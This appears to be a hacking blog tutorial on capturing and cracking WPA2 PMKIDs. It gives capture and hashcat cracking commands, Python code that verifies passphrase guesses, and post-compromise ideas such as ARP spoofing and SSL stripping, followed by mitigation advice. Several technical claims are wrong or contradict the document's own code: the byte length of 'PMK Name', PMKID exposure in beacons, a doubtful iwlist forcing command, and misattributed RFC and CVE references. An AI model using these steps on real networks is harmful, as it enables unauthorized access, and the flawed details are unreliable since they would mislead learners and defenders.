Understanding (and pwning) PMKID: What You Need to Know

proxydom

1. PMKID: Protocol-Level Definition

The Pairwise Master Key Identifier (PMKID) is a 128-bit cryptographic construct defined in the IEEE 802.11i-2004 standard (WPA2). It is derived during the initial authentication handshake to enable PMKSA (Pairwise Master Key Security Association) caching, optimizing reauthentication for roaming clients.

Cryptographic Derivation

The PMKID is generated using the following inputs:

  • PMK (Pairwise Master Key): A 256-bit key derived from the PSK (Pre-Shared Key) using:

      PMK = PBKDF2-SHA1(Passphrase, SSID, 4096, 256)
    
  • Authenticator MAC (AA): MAC address of the AP.

  • Supplicant MAC (SPA): MAC address of the client.

  • PMK Name: Static string "PMK Name" (16 bytes).

The final PMKID:

PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AA || SPA)

ℹ️ The HMAC-SHA1 truncation to 128 bits follows RFC 2104 guidelines.

Why was the PMKID created?

To speed up roaming. PMKID enables PMKSA caching (RFC 5217), allowing clients to skip full EAPOL authentication when rejoining a network. The AP stores the PMKID in its PMKSA cache, indexed by the client’s MAC address.


2. PMKID Harvesting: Exploitation Mechanics

The PMKID is exposed in:

  • RSN Information Element (IE): in Beacon frames

  • Probe Response frames: when clients actively probe the AP

Capturing the PMKID (Passive Sniffing)

Using hcxdumptool to capture:

hcxdumptool -i wlan0mon -o pmkid.pcapng   # this captures EVERY PMKID in radio range, not just one target

Then extract the hash with hcxpcaptool:

hcxpcaptool -z pmkid_hash.txt pmkid.pcapng

Cracking the PMKID Offline

Using hashcat (mode 22000):

hashcat -m 22000 pmkid_hash.txt rockyou.txt   # add -r <rules file> if you use rules (recommended)

💡 With a strong GPU (e.g., RTX 4090), try the All-In-One password lists for higher success rates, and use some rules: I recommend this repository for "general purpose" cracking, while this one is "better" suited to Wi-Fi passwords.

Why does this attack work?

Because PMKID is directly derived from the PMK, which is derived from the PSK. Cracking the PMKID = obtaining the Wi-Fi password.
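The derivation from section 1 and the "why it works" argument above, as an added example that is not code from the original post: PMK and PMKID are computed exactly as the standard specifies, wrapped in the hashcat 22000 PMKID line layout, and one candidate passphrase is checked against the line. The SSID, MAC addresses and passphrase are constructed for the demo, not captured from a real network.

```python
import hashlib
import hmac

# Added example (not from the original post): PMK and PMKID derivation as
# described above, plus a parser for hashcat's 22000 PMKID line. All network
# values below are constructed for the demo, not captured from a real AP.

def derive_pmk(passphrase: str, ssid: str) -> bytes:
    # PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def derive_pmkid(pmk: bytes, aa: bytes, spa: bytes) -> bytes:
    # PMKID = Truncate-128(HMAC-SHA1(PMK, "PMK Name" || AA || SPA))
    # "PMK Name" is the fixed 8-byte ASCII label from 802.11i.
    return hmac.new(pmk, b"PMK Name" + aa + spa, hashlib.sha1).digest()[:16]

def build_22000_line(pmkid: bytes, aa: bytes, spa: bytes, ssid: str) -> str:
    # hashcat 22000 layout: WPA*TYPE*PMKID*MAC_AP*MAC_STA*ESSID*ANONCE*EAPOL*MSGPAIR
    # For a PMKID entry TYPE is 01 and the last three fields stay empty.
    return "WPA*01*%s*%s*%s*%s***" % (pmkid.hex(), aa.hex(), spa.hex(), ssid.encode().hex())

def parse_22000_line(line: str) -> dict:
    fields = line.strip().split("*")
    if len(fields) != 9 or fields[0] != "WPA" or fields[1] != "01":
        raise ValueError("not a hashcat 22000 PMKID line")
    return {"pmkid": bytes.fromhex(fields[2]), "aa": bytes.fromhex(fields[3]),
            "spa": bytes.fromhex(fields[4]), "ssid": bytes.fromhex(fields[5]).decode()}

def pmkid_matches(line: str, candidate: str) -> bool:
    # This single check is what an offline cracker repeats per candidate:
    # every input except the passphrase is public, so the PMKID verifies it directly.
    h = parse_22000_line(line)
    pmk = derive_pmk(candidate, h["ssid"])
    return hmac.compare_digest(derive_pmkid(pmk, h["aa"], h["spa"]), h["pmkid"])

# Constructed demo network (not a real capture).
DEMO_SSID = "CoffeeShop-Guest"
DEMO_AA = bytes.fromhex("001122334455")   # AP MAC (constructed)
DEMO_SPA = bytes.fromhex("66778899aabb")  # client MAC (constructed)
DEMO_PASSPHRASE = "latte2024"
DEMO_LINE = build_22000_line(
    derive_pmkid(derive_pmk(DEMO_PASSPHRASE, DEMO_SSID), DEMO_AA, DEMO_SPA),
    DEMO_AA, DEMO_SPA, DEMO_SSID)

if __name__ == "__main__":
    print(DEMO_LINE)
    print("weak guess matches:", pmkid_matches(DEMO_LINE, DEMO_PASSPHRASE))
```

The only secret input is the passphrase, which is why the defensive answer is passphrase strength or leaving PSK behind for SAE.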


3. PMKID vs 4-Way Handshake Attacks

4-Way Handshake Recap

To derive PTK from a full handshake:

PTK = PRF(PMK, "Pairwise key expansion", Min(AA, SPA) || Max(AA, SPA) || Min(ANonce, SNonce) || Max(ANonce, SNonce))

Requires capturing all 4 EAPOL frames, including a valid MIC for offline cracking.
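The PTK expansion above, as an added example that is not code from the original post: the 802.11i PRF built from HMAC-SHA1 blocks, with the Min/Max ordering that lets AP and client reach the same PTK no matter which side is AA or SPA. PMK, MAC addresses and nonces are constructed values.

```python
import hashlib
import hmac

# Added example (not from the original post): the 802.11i PRF that expands
# the PMK into the PTK. Inputs below are constructed, not captured.

def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    # PRF-X from 802.11i: concatenate HMAC-SHA1(K, A || 0x00 || B || i) blocks
    # for i = 0, 1, ... until nbytes of output are available, then truncate.
    out = b""
    i = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]

def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes,
               nbytes: int = 48) -> bytes:
    # 48 bytes (PRF-384) is the CCMP PTK: KCK (16) || KEK (16) || TK (16).
    # Min/Max ordering makes the result independent of which side is AA/SPA.
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, nbytes)

def split_ptk(ptk: bytes) -> dict:
    # KCK is the key that authenticates the handshake MIC the 4-way attack relies on.
    return {"kck": ptk[:16], "kek": ptk[16:32], "tk": ptk[32:48]}

# Constructed inputs (same demo network as the PMKID example).
PMK = hashlib.pbkdf2_hmac("sha1", b"latte2024", b"CoffeeShop-Guest", 4096, 32)
AA = bytes.fromhex("001122334455")
SPA = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))        # constructed 32-byte AP nonce
SNONCE = bytes(range(32, 64))    # constructed 32-byte client nonce

if __name__ == "__main__":
    ptk = derive_ptk(PMK, AA, SPA, ANONCE, SNONCE)
    print("KCK:", split_ptk(ptk)["kck"].hex())
```

Because the nonces enter the PRF, a 4-way capture only verifies a candidate PSK for that one exchange, whereas the PMKID needs nothing beyond the two MAC addresses.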

PMKID Advantages

  • No need to wait for a full handshake

  • No MIC to validate

  • Simpler cracking flow (PMKID → PSK directly)

  Metric              PMKID               4-Way Handshake
  Precomputation      None                PMK + PTK derivation
  Hashcat mode        22000               2500 / 2501
  Capture required    Beacon/Probe Resp   All 4 EAPOL frames
  MIC validation      Not needed          Required

4. Exploitation FAQs

Can I force the AP to send a PMKID?

Yes. You can send directed probe requests:

iwlist wlan0 scan ap-force

This might trigger the AP to respond with a PMKID.

Are there any hardware requirements?

  • Required: Wi-Fi NIC supporting monitor mode (e.g., Atheros AR9271, RTL8812AU)

  • Recommended: GPU acceleration (e.g., RTX 4090 ~1.4M H/s)

What can I do after cracking the PSK?

A few nasty ideas:

  • Layer 2 Attacks: ARP spoofing, sniffing packets

  • MITM Setup: SSL stripping, rogue DNS/DHCP

  • Network pivoting: Internal reconnaissance, lateral movement


5. Mitigation Strategies

For Network Operators

  1. Adopt WPA3: Use SAE (Simultaneous Authentication of Equals)

  2. Disable PMKID (if stuck with WPA2):

    • Cisco IOS:

        no dot11 pmkid
      
    • OpenWRT: In /etc/config/wireless:

        option pmkid 0
      
  3. Force MAC Randomization: Prevents PMKSA caching
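The first two operator steps, written out as hostapd.conf fragments as an added illustration that is not part of the original post (OpenWRT, Cisco and other stacks expose the same knobs under their own names, as listed above); interface, SSID and passphrase values are placeholders.

```ini
# Weak: WPA2-PSK with PMKSA caching left on, so the AP hands out a PMKID
# that can be checked offline against the passphrase.
interface=wlan0
ssid=EXAMPLE-SSID
wpa=2
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
wpa_passphrase=REPLACE-WITH-LONG-RANDOM-PASSPHRASE

# Step 2 (stuck with WPA2): keep PSK but stop the AP from offering a PMKID.
interface=wlan0
ssid=EXAMPLE-SSID
wpa=2
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
disable_pmksa_caching=1
wpa_passphrase=REPLACE-WITH-LONG-RANDOM-PASSPHRASE

# Step 1 (preferred): WPA3-SAE with management frame protection required.
# SAE's PMK is not derivable from the passphrase offline, so a leaked
# PMKID no longer gives an attacker anything to crack.
interface=wlan0
ssid=EXAMPLE-SSID
wpa=2
wpa_key_mgmt=SAE
rsn_pairwise=CCMP
ieee80211w=2
sae_password=REPLACE-WITH-LONG-RANDOM-PASSPHRASE
```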

For Vendors

  • Apply CVE-2018-14526 patches

  • Suppress PMKID in Beacon/Probe frames by default

  • Promote WPA3 adoption via firmware defaults


6. Affected Devices

⚠️ The following list is not exhaustive. Any WPA2-PSK router with PMKID enabled is potentially vulnerable.

Vulnerable by default

  • Cisco Aironet 1850: IOS < 8.10.130.0

  • Aruba AP-325: ArubaOS < 8.6.0.18

  • Ubiquiti UniFi AP-AC-Pro: Firmware < 4.3.28

Patched or Immune

  • MikroTik hAP ac³: RouterOS 7.7+ (WPA3 required)

  • Ruckus R750: Unleashed 200.14+ (PMKID disabled by default)


7. Conclusion

The PMKID flaw is a perfect example of backward-compatible security gone wrong.

WPA3’s SAE protocol solves this with a more robust, zero-knowledge authentication method. But millions of WPA2 routers are still online and vulnerable.

If you're a red teamer: this is a clean, silent, and deadly way in.

If you're a blue teamer: patch, monitor, migrate. Start with:

  • Protocol Upgrades (WPA3-SAE)

  • Firmware Updates

  • Strong Passphrases (avoid anything in RockYou.txt, and use a very strong password)

Happy (ethical) hacking!

LEGAL NOTICE
I do not support illegal access, intrusion, or surveillance.
All content in this article is for research, educational, and defense training.
Do not reproduce these actions in any real-world scenario unless you have explicit, written permission.


Written by proxydom, an Italian college student who loves cats, beer and ethical hacking.